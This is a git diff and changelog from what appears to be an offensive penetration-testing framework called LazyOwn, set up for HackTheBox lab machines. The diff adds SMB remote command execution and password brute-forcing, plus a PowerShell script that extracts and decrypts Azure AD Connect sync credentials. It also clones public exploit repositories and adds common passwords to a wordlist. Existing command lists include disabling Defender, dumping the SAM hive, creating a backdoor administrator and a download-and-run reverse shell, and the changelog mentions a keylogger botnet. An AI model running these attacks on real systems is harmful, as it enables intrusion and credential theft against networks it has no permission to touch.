in external :) https://github.com/BloodHoundAD/SharpHound.git :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
MAchine Blazorized.htb :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
MAchine :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
@@ -9303,24 +9317,24 @@ command to copy the exploits from exploitdb use cp
relative/path/show/in/searchexploit when you use the flag -x :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
command dsnmap :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
machine Runner.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
@@ -9328,223 +9342,223 @@ command :) new resources in sessions, new module lazypsexec bruteforce
:)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
command :) samrdump
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 news
script bruteforce on modules :) :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command dnsenum :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
command dig
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
command dig
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
commands :)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
commands :) to se use tab tab or ?
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new payloads in sessions directory :) :) :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new exploits :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new command run lazywerkzeugdebug
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new commands createhash, createwebshell, sqlmap, proxy,
john2hash
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create internal_discover.sh
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 2 new exploit external :D working like a charm
-Otros
Otros
+Otros
- new exploit werkzeug in debug mode lettle retocated to run in
python3 from searchsploit :D
-Otros
Otros
+Otros
- new command: exploits externals :D
-Otros
Otros
+Otros
- new command: smbmap whattomap ex: smbmap tmp :D
-Otros
Otros
+Otros
- go buster new parameter url to use url from payload not rhost
-Otros
Otros
+Otros
- parameter added to gospider url to use var url in payload not rhost
@@ -9552,66 +9566,66 @@ and add the command addhost host.ext to add the domain with rhost
parameter to /etc/hosts not now to windows sistems sorry
-Otros
Otros
+Otros
- refactor global var rhost deleted other ones
-Otros
Otros
+Otros
- path hijacking add line to temp bash script
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new command: wfuzz :D and you can add example a hide line option
like # wfuzz –hl=9 to hide responses with long line to 9
-Otros
Otros
+Otros
- new command: run lazyssh77enum to enum using a wordlist and exploit
foound searchsploit as openssh 7.7
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- smbclient command and exploit to enum ssh i used in a machine of
@@ -9619,269 +9633,269 @@ hackthebox to enum, i upload because i was lazy and dont deleted before
xD
-Otros
Otros
+Otros
- Merge pull request #22 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new command getseclist :D
-Otros
Otros
+Otros
- payload.json to play on hackthebox :D
-Otros
Otros
+Otros
- port a python del exploit archiconocido de meta exploit vsftpd
3.0.3
-Otros
Otros
+Otros
- shell payload in python generated by msfvenom automated by lazyown
framework ;)
-Otros
Otros
+Otros
- new commit to check if alsr is activated in the kernel
-Otros
Otros
+Otros
- deleted shells generated by the script
-Otros
Otros
+Otros
- upx to shells generated by msfvenom automated by lazyown framework
;)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new path to diccionary to run by default in parrot
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #21 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy ntlmv2 firstaproach using in hashes.txt the ouput smbserver
command when the conection is established
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy get smbserver with impacket :) and then you can sudo
@@ -9889,1354 +9903,1354 @@ impacket-smbserver smbfolder /home/gris/tools/LazyOwn -smb2support with
simple smbserver in LazyOwn console
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn FTP sniff prety messages :)
-Otros
Otros
+Otros
- LazyOwn keygen to generate keys to use in payload.json to cypher the
conections
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn http sniff :( not working fine yet
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn ArpSpoofing README and banner :P [;,;]
-Otros
Otros
+Otros
- LazyOwn ArpSpoofing [;,;]
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy Log more lfi list :)
-Otros
Otros
+Otros
- Lazy Log Poisonig more poison bro
-Otros
Otros
+Otros
- Lazy Log Poisonig in ssh first aproach
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Delete lazylogpisoning.py
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- #!/usr/bin/env python3 #_*_ coding: utf8 _*_
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
- add #!/usr/bin/env python3 #_*_ coding: utf8 _*_
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- tentativas de herramientas nuevas
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- imlementacion de libreria pwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- mejora en la webshell de python
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- return jsonify({“error”: “error”}), 500
-Otros
Otros
+Otros
- Fix code scanning alert - Information exposure through an exception
#16
-Otros
Otros
+Otros
- Fix code scanning alert - Flask app is run in debug mode #17
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nueva interfaz web experimental
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nuevo bot de investigacion
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
- New BotNet with Keylogger
-Otros
Otros
+Otros
- Merge pull request #13 from grisuno/grisuno-patch-7
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create pull_request_template.md
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create pull_request_template.md
-Otros
Otros
+Otros
- device to sniff parametric
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nuevo modulo de gathering
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nueva estructura de directorios
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #10 from grisuno/grisuno-patch-6
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #8 from grisuno/grisuno-patch-6
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyown_metaextract0r.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyown_bprfuzzer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #6 from grisuno/grisuno-patch-5
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update lazyreverse_shell.sh
-Otros
Otros
+Otros
- Merge pull request #5 from grisuno/grisuno-patch-4
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyreverse_shell.sh
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update LazyOwnExplorer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create LazyOwnExplorer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #4 from grisuno/grisuno-patch-3
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create CODE_OF_CONDUCT.md
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #3 from grisuno/grisuno-patch-2
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #1 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- ██╗ █████╗ ███████╗██╗ ██╗ ██████╗ ██╗ ██╗███╗ ██╗ ██║
@@ -11247,64 +11261,64 @@ conections
╚══╝╚══╝ ╚═╝ ╚═══╝
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create bin_data_relevant.csv
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create detailed_search.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update README.md
diff --git a/external/install_external.sh b/external/install_external.sh
index 4a1d8be8..fdf3c320 100755
--- a/external/install_external.sh
+++ b/external/install_external.sh
@@ -95,6 +95,9 @@ download() {
"git clone https://github.com/ropnop/windapsearch.git .exploit/windap"
"git clone https://github.com/cytopia/badchars.git .exploit/badchars"
"git clone https://github.com/worawit/MS17-010.git .exploits/MS17EternalBlue"
+ "git clone https://github.com/synacktiv/CVE-2023-35001.git .exploit/CVE-2023-35001"
+ "git clone https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection.git .exploit/CVE-2023-36664"
+ "git clone https://github.com/dirkjanm/adconnectdump.git .exploit/adconnectdump"
)
# Imprime los últimos argumentos de cada comando
echo " [+] Seleccione el número del comando que desea clonar:"
diff --git a/lazyown b/lazyown
index dc3e478d..21ee9125 100644
--- a/lazyown
+++ b/lazyown
@@ -81,10 +81,12 @@ class LazyOwnShell(Cmd):
"creds": "sh cat sessions/credentials*",
"discovery": "run lazynmapdiscovery",
"duckdns": "sh bash modules/duckdns.sh",
+ "edit":"sh nano payload.json",
"ftpsniff": "run lazyftpsniff",
"gpt": "run lazygptcli",
"hash": "sh cat sessions/hash*",
"hosts": "sh sudo nano /etc/hosts",
+ "info":"echo \"\" > sessions/info.php",
"ls": "list",
"nmap": "run lazynmap",
"now": "clock",
@@ -2348,6 +2350,7 @@ class LazyOwnShell(Cmd):
:returns: None"""
rhost = self.params["rhost"]
lhost = self.params["lhost"]
+ domain = self.params["domain"]
path = os.getcwd()
path_cred = f"{path}/sessions/credentials.txt"
if not check_rhost(rhost):
@@ -2370,36 +2373,59 @@ class LazyOwnShell(Cmd):
print_msg('find /mnt/smb -type d -exec sh -c \'touch "$0/x" 2>/dev/null && echo "$0 is writable" && rm "$0/x"\' {} \;')
return
else:
+ path_cred = get_credentials(True)
+ if_execute = input(f" {GREEN}[?] Do you wanna try exec commands (y/n)") or "n"
+ if if_execute == "y":
+ execute = " -x "
+ command_try = input(f" {GREEN}[!] Enter the command to try (default: whoami): ") or "whoami"
+ execute += command_try
+ else:
+
+ if_search = input(f" {GREEN}[?] Do you wanna try search files (y/n)") or "n"
+ if if_search == "y":
+ execute = " -A "
- if line:
- with open(path_cred, "r") as file:
- for file_line in file:
- params = file_line.split(":")
- user = params[0]
- passwd = params[1].replace("\n", "")
- command = f"smbmap -u {user} -p {passwd} -H {rhost} -R {line}"
- copy2clip(passwd)
- print_msg(command)
- os.system(command)
- print_msg(
- f'Exploit smb if is posible mount -t cifs -o rw,username=guest,password= "//{rhost}/share" /mnt/smb '
- )
- print_msg('find /mnt/smb -type d -exec sh -c \'touch "$0/x" 2>/dev/null && echo "$0 is writable" && rm "$0/x"\' {} \;')
- return
+ command_try = input(f" {GREEN}[!] Enter the share for potentially interesting files [default: (xlsx|docx|txt|xml)]: ") or "(xlsx|docx|txt|xml)"
+ execute += f"'{command_try}' -R"
+ else:
+ execute = ""
+
+ with open(path_cred, "r") as file:
+ for file_line in file:
+ params = file_line.split(":")
+ user = params[0]
+ passwd = params[1].replace("\n", "")
+
+ if len(execute) == 0:
+ if line:
+ command = f"smbmap -u {user} -p {passwd} -H {rhost} -R {line}"
+ copy2clip(passwd)
+ print_msg(command)
+ os.system(command)
+ print_msg(
+ f'Exploit smb if is posible mount -t cifs -o rw,username=guest,password= "//{rhost}/share" /mnt/smb '
+ )
+ print_msg('find /mnt/smb -type d -exec sh -c \'touch "$0/x" 2>/dev/null && echo "$0 is writable" && rm "$0/x"\' {} \;')
+ return
+ else:
+ command = f"smbmap -u {user} -p {passwd} -H {rhost}"
+ copy2clip(passwd)
+ print_msg(command)
+ os.system(command)
+ print_msg(
+ f'Exploit smb if is posible mount -t cifs -o rw,username=guest,password= "//{rhost}/share" /mnt/smb '
+ )
+ print_msg('find /mnt/smb -type d -exec sh -c \'touch "$0/x" 2>/dev/null && echo "$0 is writable" && rm "$0/x"\' {} \;')
+ return
else:
- with open(path_cred, "r") as file:
- for file_line in file:
- params = file_line.split(":")
- user = params[0]
- passwd = params[1].replace("\n", "")
- command = f"smbmap -u {user} -p {passwd} -H {rhost}"
- copy2clip(passwd)
- print_msg(command)
- os.system(command)
- print_msg(
- f'Exploit smb if is posible mount -t cifs -o rw,username=guest,password= "//{rhost}/share" /mnt/smb '
- )
- print_msg('find /mnt/smb -type d -exec sh -c \'touch "$0/x" 2>/dev/null && echo "$0 is writable" && rm "$0/x"\' {} \;')
+ command = f"cd sessions && smbmap -u {user} -p {passwd} -d {domain} -H {rhost} {execute}"
+ print_msg(command)
+ os.system(command)
+ print_msg(
+ f'Exploit smb if is posible mount -t cifs -o rw,username=guest,password= "//{rhost}/share" /mnt/smb '
+ )
+ print_msg('find /mnt/smb -type d -exec sh -c \'touch "$0/x" 2>/dev/null && echo "$0 is writable" && rm "$0/x"\' {} \;')
+ return
return
def do_getnpusers(self, line):
@@ -3240,6 +3266,7 @@ class LazyOwnShell(Cmd):
"""
path = os.getcwd()
rhost = self.params["rhost"]
+ domain = self.params["domain"]
if check_rhost(rhost):
if line:
if line.startswith("rid"):
@@ -3290,7 +3317,21 @@ class LazyOwnShell(Cmd):
os.system(f"crackmapexec smb {rhost} -u {username} -p '{password}'")
print_warn(f"Done... crackmapexec smb {rhost} -u {username} -p '{password}'")
return
-
+ elif line.startswith("brute"):
+ print_msg("Enter the users diccionary:")
+ path_cred = get_users_dic()
+ print_msg("Enter the password diccionary:")
+ pass_cred = get_users_dic()
+ if not os.path.exists(path_cred):
+ print_error(f"Error with the file: {pass_cred}")
+ return
+ else:
+ print_msg("Brute-forcing SMB... this may take several minutes...")
+ command = f"crackmapexec smb {rhost} -d {domain} -u {path_cred} -p {pass_cred} --continue-on-success"
+ print_msg(f"Try... {command}")
+ os.system(command)
+ print_warn(f"Done... {command}")
+ return
print_msg(f"Try... crackmapexec smb {rhost}")
os.system(f"crackmapexec smb {rhost}")
@@ -5155,6 +5196,7 @@ class LazyOwnShell(Cmd):
lport = self.params["lport"]
url = self.params["url"]
domain = self.params["domain"]
+ subdomain = self.params["subdomain"]
asub = domain.split(".")
name = asub[0]
ext = asub[1]
@@ -5162,10 +5204,9 @@ class LazyOwnShell(Cmd):
return
commands_list = [
- ("List dir", "ls -lha"),
+
("list file attributes on a Linux second extended file system", "lsattr -va"),
("show opened ports", "netstat -an | grep -i listen"),
- ("process status", "ps aux"),
("Find", "find / -type f \( -iname '*cred*' -o -iname '*pass*' -o -iname 'credentials' -o -iname 'password' \) -print -o -exec grep -i -l -e 'cred' -e 'pass' -e 'credentials' -e 'password' {} + 2>/dev/null"),
("find all suid files", "find / -type f -perm -04000 -ls"),
("find suid files in current dir", "find . -type f -perm -04000 -ls"),
@@ -5248,7 +5289,7 @@ class LazyOwnShell(Cmd):
("WIN RemoteSigned", "Set-ExecutionPolicy RemoteSigned -Scope Process"),
("WIN Disable defender", "Set-MpPreference -SubmitSamplesConsent 2 -MAPSReporting 0"),
("WIN sam", "cd / ; mkdir Temp ; reg save hklm\sam c:\Temp\sam ; reg save hklm\system c:\Temp\system ; cd Temp ; download sam ; download system"),
- ("PYPYKATZ", "pypykatz registry --sam sam system"),
+ ("WIN PYPYKATZ", "pypykatz registry --sam sam system"),
("WIN WEB Inyection", "abc.txt | powershell -enc "),
("WIN WEB Inyection" ,'abc.txt | net user lazyown abc123! /add ; net localgroup administrators lazyown /add'),
("WIN ReverShell winbase64encode", f'echo -n "IEX(New-Object System.Net.WebClient).DownloadString(\'http://{lhost}/Invoke-PowerShellTcp.ps1\')" | iconv -t UTF-16LE | base64 -w0'),
@@ -5257,10 +5298,14 @@ class LazyOwnShell(Cmd):
("WIN enum Policy", "get-applockerpolicy -effective | select -expandproperty rulecollections"),
("WIN enum WMI access",'netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes'),
("WIN Identify Exclusions",'& "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\\folder_to_check\|*"'),
+ ("WIN ADSync", "Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync"),
+ ("WIN ADSync Property","Get-ItemProperty -Path \"C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe\" | Format-list -Property * -Force"),
+ ("WIN ADSync Sql",f"sqlcmd -S {subdomain} -Q \"use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration\""),
("WEB linkedin.com workers scrapper", 'var employees = []; employees = employees.concat(document.getElementsByTagName("h3")); for(var i=0;i 0 else input(f" [!] Enter the SQL Server (default '{subdomain}'): ").strip() or subdomain
+ database = args[1] if len(args) > 1 else input(" [!] Enter the Database Name (default 'ADSync'): ").strip() or "ADSync"
+ key_id = args[2] if len(args) > 2 else input(" [!] Enter Keyset ID (default '1'): ").strip() or "1"
+ instance_id = args[3] if len(args) > 3 else input(" [!] Enter Instance ID (GUID): ").strip()
+ entropy = args[4] if len(args) > 4 else input(" [!] Enter Entropy (GUID): ").strip()
+ dll_path = input(" [!] Enter the path to 'mcrypt.dll' (default 'C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll'): ").strip() or 'C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll'
+ config1 = input(" [!] enter parameter nº 1 (default: forest-login-domain)") or "forest-login-domain"
+ config2 = input(" [!] enter parameter nº 2 (default: forest-login-user)") or "forest-login-user"
+ ps_script = '''Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"
+ $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server={server};Database={database};Trusted_Connection=true"
+ $client.Open()
+ $cmd = $client.CreateCommand()
+ $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
+ $reader = $cmd.ExecuteReader()
+ $reader.Read() | Out-Null
+ $config = $reader.GetString(0)
+ $crypted = $reader.GetString(1)
+ $reader.Close()
+
+ add-type -path '{dll_path}'
+ $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
+ $km.LoadKeySet([GUID]"{entropy}", [GUID]"{instance_id}", {key_id})
+ $key = $null
+ $km.GetActiveCredentialKey([ref]$key)
+ $key2 = $null
+ $km.GetKey(1, [ref]$key2)
+ $decrypted = $null
+ $key2.DecryptBase64ToString($crypted, [ref]$decrypted)
+
+ $domain = (select-xml -Content $config -XPath "//parameter[@name='{config1}']").Node.InnerText
+ $username = (select-xml -Content $config -XPath "//parameter[@name='{config2}']").Node.InnerText
+ $password = (select-xml -Content $decrypted -XPath "//attribute").Node.InnerText
+
+ Write-Host ("Domain: " + $domain)
+ Write-Host ("Username: " + $username)
+ Write-Host ("Password: " + $password)
+ '''.replace("{server}", server).replace("{database}", database).replace("{dll_path}", dll_path).replace("{entropy}", entropy).replace("{instance_id}", instance_id).replace("{key_id}", key_id).replace(" ","").replace("{config1}", config1).replace("{config2}", config2)
+
+ with open('sessions/adconnect.ps1', 'w') as file:
+ file.write(ps_script)
+
+ print_msg("PowerShell script 'sessions/adconnect.ps1' has been created.")
+ return
+
+
if __name__ == "__main__":
p = LazyOwnShell()
p.onecmd("p")
diff --git a/modules/credentials.json b/modules/credentials.json
index bcf6d0d8..63fb1c84 100644
--- a/modules/credentials.json
+++ b/modules/credentials.json
@@ -55,11 +55,15 @@
"ikwd",
"jvc",
"kj3TqCWv",
+ "Letmein1",
+ "Letmein123",
"meinsm",
"pass",
"Pass",
"password",
+ "Password1",
"password123",
+ "Password123",
"qwerty",
"qwerty123",
"Recorder",
@@ -77,6 +81,8 @@
"user",
"wbox",
"wbox123",
+ "Welcome1",
+ "Welcome123",
"Y5eIMz3C"
]
diff --git a/payload.json b/payload.json
index fdfc5549..00f8b950 100644
--- a/payload.json
+++ b/payload.json
@@ -2,8 +2,8 @@
"binary_name": "bash",
"api_key": "I_had_created_an_APIkey_and_published_it_for_free..._but,_someone_misused,_and_I_had_to_revoke_it...",
"prompt": "Presentate como Lazy OWN OneLiner assistant",
- "url": "http://heist.htb",
- "domain": "heist.local",
+ "url": "http://monteverde.htb",
+ "domain": "monteverde.local",
"subdomain": "dc01",
"method": "POST",
"headers": "{\"Content-Type\": \"application/json\"}",
@@ -21,7 +21,7 @@
"mode": "attack",
"reverse_shell_port": 4444,
"path": "/home/$USER",
- "rhost": "10.10.10.149",
+ "rhost": "10.10.10.172",
"lhost": "10.10.14.2",
"rport": 5555,
"lport": 5555,
diff --git a/sessions/download_resources.sh b/sessions/download_resources.sh
index 7db018b8..c8fc6335 100755
--- a/sessions/download_resources.sh
+++ b/sessions/download_resources.sh
@@ -49,6 +49,7 @@ download() {
"wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip"
"wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/dev/Recon/PowerView.ps1"
"wget https://download.sysinternals.com/files/Procdump.zip"
+ "wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst"
)
# Imprime los últimos argumentos de cada comando
diff --git a/version.json b/version.json
index 78c093a5..e72d1b4b 100644
--- a/version.json
+++ b/version.json
@@ -1 +1 @@
-{"version": "release/0.1.64"}
+{"version": "release/0.1.65"}